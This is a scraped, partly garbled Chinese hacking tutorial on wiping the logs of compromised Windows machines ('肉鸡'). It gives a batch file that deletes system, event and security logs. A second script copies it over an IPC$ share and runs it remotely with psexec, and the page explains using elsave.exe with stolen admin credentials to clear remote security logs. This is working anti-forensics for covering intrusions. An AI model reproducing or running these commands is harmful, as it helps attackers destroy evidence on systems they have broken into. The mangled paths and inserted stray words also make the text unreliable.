@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面
内容保存为del.bat备用
在上面代码中echo是DOS下回显命令
在它前面加上“@”前缀
表示执行时本行在命令行或DOS里面不显示另外del命令大家
定清楚吧?它是删除文件命令 接下来再新建
个批处理文件内容如下: @copy del.bat \%1c$Content$nbsp;
@echo 向肉鸡复制本机
del.bat……OK @psexec \%1 c:del.bat
@echo 在肉鸡上运行del.bat
清除日志文件……OK 保存为clean.bat即可
假设已经和肉鸡进行了IPC连接然后在CMD下输入:clean.bat 肉鸡IP即可清除肉鸡上日志文件 清除日志
另外个思路方法是借助第 3方软件Software如著名黑客软件Software流光开发者黑客小榕elsave.exe就是是款可以远程清除系统日志、应用
日志、安全日志软件Software大家可以在网上下载到elsave.exe使用起来很简单首先利用获得管理员账号和对方建立IPC会话:net use \ip pass /user: user然后在命令行下执行如下命令:elsave -s \ip -l application -C这样就删除了安全日志 篇文章: 伪造返回地址绕过CallStack检测以及检测伪造返回地址实战笔记篇文章: 推荐:新型注入方式直击网络——session注入探究
最新评论